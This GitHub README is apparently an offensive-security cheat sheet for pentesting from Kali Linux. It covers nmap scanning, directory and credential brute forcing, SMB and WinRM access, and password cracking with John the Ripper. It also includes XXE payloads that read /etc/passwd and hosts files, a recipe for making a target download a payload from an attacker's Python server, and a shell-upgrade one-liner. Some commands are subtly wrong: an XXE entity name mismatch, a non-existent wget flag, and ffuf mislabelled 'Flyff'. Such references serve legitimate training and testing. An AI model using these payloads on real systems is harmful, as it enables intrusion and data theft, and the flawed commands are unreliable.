kqjy/Offensive-Security-Cheat-Sheet
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
dcc10e9b0b563112f31d4af023b3cfa4c235f5db
Offensive-Security-Cheat-Sheet/README.md
Joe Totes dcc10e9b0b Update README.md
2022-08-03 17:00:53 -04:00

439 lines
9.0 KiB
Markdown
Raw Blame History

***
# Offensive Security Tools
***
<br />
Here you will find a useful collection of commands and file resource locations used in Pentesting operations. This reference is will go hand in hand with Kali Linux.
This is intended to be viewed in the blog found here: [Offensive Security Cheat Sheet](https://totes5706.github.io/Offensive-Security-Cheat-Sheet/)
<br />
***
# General Enumeration
***
<br />
## NMAP
<br />
```bash
# About: A network scanning tool that identifies devices, ports, services, and operating systems
# Download: Pre-installed on Kali Linux
# Usage
nmap -p- --min-rate 5000 -sC -sV {IP ADDRESS}
# UDP Scan
sudo nmap -sU {IP ADDRESS}
# Flags
# -p-: scans ALL ports
# --min-rate <number>: Send packets no slower than <number> per second
# -sC: equivalent to --script=default
# -sV: Probe open ports to determine service/version info
# -sU: UDP port scan
```
<br />
## NMAP Automator
<br />
```bash
# About: Useful script that automates multiple enumeration scans in succession
# Download: https://github.com/21y4d/nmapAutomator/blob/master/nmapAutomator.sh
# Usage
./nmapAutomator.sh --host {IP ADDRESS} --type All
# Flags
# --type Network : Shows all live hosts in the host's network (~15 seconds)
# --type Port : Shows all open ports (~15 seconds)
# --type Script : Runs a script scan on found ports (~5 minutes)
# --type Full : Runs a full range port scan, then runs a thorough scan on new ports (~5-10 minutes)
# --type UDP : Runs a UDP scan "requires sudo" (~5 minutes)
# --type Vulns : Runs CVE scan and nmap Vulns scan on all found ports (~5-15 minutes)
# --type Recon : Suggests recon commands, then prompts to automatically run them
# --type All : Runs all the scans (~20-30 minutes)
```
<br />
***
# Port Enumeration
***
<br />
## FTP [21]
<br />
### ftp
<br />
```bash
# About: Connect to FTP server
# Download: Pre-installed on Kali Linux
# Usage
ftp {IP ADDRESS}
# Additional Information
# Default Credentials: anonymous
# Directory Command: dir
# Download Command: get
# Upload Command: put
```
<br />
<br />
## SSH [22]
<br />
## DNS [53]
<br />
## TFTP [69]
<br />
### tftp
<br />
```bash
# About: Connect to TFTP server
# Download: Pre-installed on Kali Linux
# Usage
tftp {IP ADDRESS}
# Additional Information
# Only detectable via UDP scan
# No authentication required
```
<br />
## FINGER [79]
<br />
## Web Server [80, 443]
<br />
### gobuster
<br />
```bash
# About: Used to brute force web directories
# Download: https://github.com/OJ/gobuster/releases
# Usage
gobuster dir -u {IP ADDRESS} -w /usr/share/wordlists/dirb/common.txt
# Notes: Not recursive, only digs one level deep
# Alternative word lists & locations
┌──(kali㉿kali)-[/usr/share/wordlists/dirb]
big.txt
catala.txt
common.txt
euskera.txt
extensions_common.txt
indexes.txt
mutations_common.txt
others
small.txt
spanish.txt
stress
vulns
┌──(kali㉿kali)-[/usr/share/wordlists/dirbuster]
apache-user-enum-1.0.txt
apache-user-enum-2.0.txt
directories.jbrofuzz
directory-list-1.0.txt
directory-list-2.3-small.txt
directory-list-lowercase-2.3-small.txt
directory-list-2.3-medium.txt
directory-list-lowercase-2.3-medium.txt
```
<br />
### XXE - XML External Entity
<br />
```bash
# About: Try against weak XML parsers
# Usage Windows
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/windows/system32/drivers/etc/hosts'>]>
<data>&test;</data>
# Usage Linux
<!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]>
<data>&test;</data>
```
<br />
## Kerberos [88]
<br />
## POP3 [110]
<br />
## SNMP [161]
<br />
## LDAP [389]
<br />
## SMB [445]
### smbclient
<br />
```bash
# About: Used to connect to SMB
# Download: Pre-installed on Kali Linux
# Usage
# List all SMB Shares
smbclient -L {TARGET_IP}
# Authenticate with local credentials
smbclient -N \\\\{TARGET_IP}\\{SHARE}
# Authenticate with Administrator
smbclient -N \\\\{TARGET_IP}\\{SHARE} -u Administrator
```
<br />
## MSSQL [1433]
<br />
## NFS [2049]
<br />
## RDP [3389]
<br />
## WINRM [5985, 5986]
<br />
```bash
# About: A tool used to hack WINRM from a linux console
# Download: Pre-installed on Kali Linux
# Usage
evil-winrm -i {IP ADDRESS} -u {USERNAME} -p {PASSWORD}
# Note: Requires credentials
# {IP ADDRESS}: IP Address of the Server
# {USERNAME}: User Authentication
# {PASSWORD}: Password Authentication
```
<br />
# Password Cracking
***
## John The Ripper
<br />
```bash
# About: A tool used to crack passwords, hashes, and zip files
# Download: Pre-installed on Kali Linux
# Usage - Crack a zip file {FILE.zip} and output hash into text file {FILE.txt}
sudo zip2john {FILE.zip} > {FILE.txt}
# Usage - Crack a rar file {FILE.rar} and output hash into text file {FILE.txt}
sudo rar2john {FILE.rar} > {FILE.txt}
# Usage - Crack a password file {FILE.txt}
john -w=/usr/share/wordlists/rockyou.txt {FILE.txt}
# --format={HASH}: Specifiy a hash type to crack (see below)
:'
descrypt, bsdicrypt, md5crypt, md5crypt-long, bcrypt, scrypt, LM, AFS,
tripcode, AndroidBackup, adxcrypt, agilekeychain, aix-ssha1, aix-ssha256,
aix-ssha512, andOTP, ansible, argon2, as400-des, as400-ssha1, asa-md5,
AxCrypt, AzureAD, BestCrypt, BestCryptVE4, bfegg, Bitcoin, BitLocker,
bitshares, Bitwarden, BKS, Blackberry-ES10, WoWSRP, Blockchain, chap,
Clipperz, cloudkeychain, dynamic_n, cq, CRC32, cryptoSafe, sha1crypt,
sha256crypt, sha512crypt, Citrix_NS10, dahua, dashlane, diskcryptor, Django,
django-scrypt, dmd5, dmg, dominosec, dominosec8, DPAPImk, dragonfly3-32,
dragonfly3-64, dragonfly4-32, dragonfly4-64, Drupal7, eCryptfs, eigrp,
electrum, EncFS, enpass, EPI, EPiServer, ethereum, fde, Fortigate256,
Fortigate, FormSpring, FVDE, geli, gost, gpg, HAVAL-128-4, HAVAL-256-3, hdaa,
hMailServer, hsrp, IKE, ipb2, itunes-backup, iwork, KeePass, keychain,
keyring, keystore, known_hosts, krb4, krb5, krb5asrep, krb5pa-sha1, krb5tgs,
krb5-17, krb5-18, krb5-3, kwallet, lp, lpcli, leet, lotus5, lotus85, LUKS,
MD2, mdc2, MediaWiki, monero, money, MongoDB, scram, Mozilla, mscash,
mscash2, MSCHAPv2, mschapv2-naive, krb5pa-md5, mssql, mssql05, mssql12,
multibit, mysqlna, mysql-sha1, mysql, net-ah, nethalflm, netlm, netlmv2,
net-md5, netntlmv2, netntlm, netntlm-naive, net-sha1, nk, notes, md5ns,
nsec3, NT, o10glogon, o3logon, o5logon, ODF, Office, oldoffice,
OpenBSD-SoftRAID, openssl-enc, oracle, oracle11, Oracle12C, osc, ospf,
Padlock, Palshop, Panama, PBKDF2-HMAC-MD4, PBKDF2-HMAC-MD5, PBKDF2-HMAC-SHA1,
PBKDF2-HMAC-SHA256, PBKDF2-HMAC-SHA512, PDF, PEM, pfx, pgpdisk, pgpsda,
pgpwde, phpass, PHPS, PHPS2, pix-md5, PKZIP, po, postgres, PST, PuTTY,
pwsafe, qnx, RACF, RACF-KDFAES, radius, RAdmin, RAKP, rar, RAR5, Raw-SHA512,
Raw-Blake2, Raw-Keccak, Raw-Keccak-256, Raw-MD4, Raw-MD5, Raw-MD5u, Raw-SHA1,
Raw-SHA1-AxCrypt, Raw-SHA1-Linkedin, Raw-SHA224, Raw-SHA256, Raw-SHA3,
Raw-SHA384, restic, ripemd-128, ripemd-160, rsvp, RVARY, Siemens-S7,
Salted-SHA1, SSHA512, sapb, sapg, saph, sappse, securezip, 7z, Signal, SIP,
skein-256, skein-512, skey, SL3, Snefru-128, Snefru-256, LastPass, SNMP,
solarwinds, SSH, sspr, Stribog-256, Stribog-512, STRIP, SunMD5, SybaseASE,
Sybase-PROP, tacacs-plus, tcp-md5, telegram, tezos, Tiger, tc_aes_xts,
tc_ripemd160, tc_ripemd160boot, tc_sha512, tc_whirlpool, vdi, OpenVMS, vmx,
VNC, vtp, wbb3, whirlpool, whirlpool0, whirlpool1, wpapsk, wpapsk-pmk,
xmpp-scram, xsha, xsha512, zed, ZIP, ZipMonster, plaintext, has-160,
HMAC-MD5, HMAC-SHA1, HMAC-SHA224, HMAC-SHA256, HMAC-SHA384, HMAC-SHA512,
dummy, crypt
'
```
<br />
## Flyff
<br />
```bash
# About: A tool used to brute force web credentials
# Download: Pre-installed on Kali Linux
# Usage - One variable FUZZ
ffuf -c -request {FILE.req} -request-proto http -w /usr/share/seclists/Passwords/probable-v2-top1575.txt -fr "{FILTER}"
# EXAMPLE {FILE}
username=admin$password=FUZZ
```
<br />
# Payload File Transfer
***
## Python Server [STEP 1]
<br />
```bash
# About: A python command used to open a server on the client machine
# Download: Pre-installed on Kali Linux
# USAGE - Host on client machine
sudo python3 -m http.server {PORT}
# {PORT}: Port to open for file transfer
```
<br />
## WGET [STEP 2]
<br />
```bash
# About: A command used to download files on the current machine
# Download: Pre-installed on Kali Linux
# Usage - Download on server machine
wget http://{IP ADDRESS}/{FILE} -outfile {FILE}
# {IP ADDRESS}: IP Address of the client from step one (python server)
# {FILE}: The payload to be transferred
```
<br />
# Privilege Escalation
[https://gtfobins.github.io/](https://gtfobins.github.io/)
## Linux
## Windows
# Reverse Shell
[https://www.revshells.com/](https://www.revshells.com/)
## Linux
## Windows
# Shell Upgrade
<br />
## Python
<br />
```bash
# About: A command spawn a new shell using python
# Download: May or may not be installed on server machine
# Usage
python3 -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
# Additional Functionality
CTRL&Z
stty raw -echo; fg;
export TERM=xterm
```
Reference in New Issue View Git Blame Copy Permalink